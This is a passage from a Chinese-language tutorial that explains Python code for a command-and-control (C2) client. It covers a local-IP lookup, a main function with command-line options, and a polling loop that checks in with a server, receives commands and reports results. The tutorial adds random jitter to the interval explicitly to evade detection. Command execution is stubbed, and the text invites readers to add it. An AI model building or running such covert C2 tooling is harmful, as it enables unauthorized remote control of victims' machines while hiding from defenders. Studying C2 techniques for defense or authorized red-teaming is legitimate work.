- 支持通过
**kwargs
添加额外参数 - 调用
communicate
方法发送数据
4.5 辅助方法与轮询模式
def _get_local_ip(self) -> str:
"""获取本地IP地址"""
try:
# 通过临时连接获取本地IP(不实际建立连接)
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80)) # 连接到公共DNS服务器
return s.getsockname()[0] # 获取本地绑定的IP
except:
return "unknown"
def start_polling(self, initial_command: str = "check_in") -> None:
"""启动轮询模式,定期与服务器通信"""
logging.info(f"Starting polling with interval {self.config.poll_interval}s")
try:
while True:
# 发送初始检查命令
response = self.send_command(initial_command)
if response and "command" in response:
# 若服务器返回命令,执行并发送结果
command = response["command"]
logging.info(f"Received command from server: {command}")
# 此处可扩展实际命令执行逻辑
result = f"Command '{command}' executed at {datetime.utcnow().isoformat()}"
# 发送命令执行结果
self.send_command("result", command=command, result=result)
# 随机化轮询间隔(±20%抖动),避免规律性模式被检测
jitter = random.uniform(-0.2, 0.2)
sleep_time = self.config.poll_interval * (1 + jitter)
logging.info(f"Next poll in {sleep_time:.2f} seconds")
time.sleep(sleep_time)
except KeyboardInterrupt:
logging.info("Polling stopped by user")
except Exception as e:
logging.error(f"Error in polling loop: {str(e)}", exc_info=True)
_get_local_ip
:获取客户端本地 IP 地址(通过临时连接到公共服务器实现)start_polling
:启动轮询模式(核心功能之一):- 定期与服务器通信(默认间隔 60 秒)
- 接收服务器下发的命令,执行后返回结果
- 轮询间隔添加随机抖动(±20%),避免固定时间间隔被检测(提高隐蔽性)
5. 主函数 main
def main():
"""主函数"""
parser = argparse.ArgumentParser(description="Enhanced C2 Client")
parser.add_argument("--config", help="Path to configuration file", default="client_config.json")
parser.add_argument("--command", help="Send a single command to the server")
parser.add_argument("--poll", action="store_true", help="Start polling the server continuously")
args = parser.parse_args()
# 加载配置
config = C2ClientConfig()
config.load_from_file(args.config)
# 创建客户端实例
client = EnhancedC2Client(config)
# 执行操作
if args.command:
logging.info(f"Sending command: {args.command}")
response = client.send_command(args.command)
if response:
logging.info(f"Server response: {json.dumps(response, indent=2)}")
else:
logging.error("No response from server")
elif args.poll:
client.start_polling()
else:
parser.print_help()
- 处理命令行参数:支持指定配置文件、发送单条命令、启动轮询模式
- 加载配置文件并创建客户端实例
- 根据参数执行对应操作:发送单命令或启动轮询
服务端实操
客户端实操
以上代码能够基本构成简单的C2通道,在此代码的基础上,能够增加许多的功能,比如命令执行等。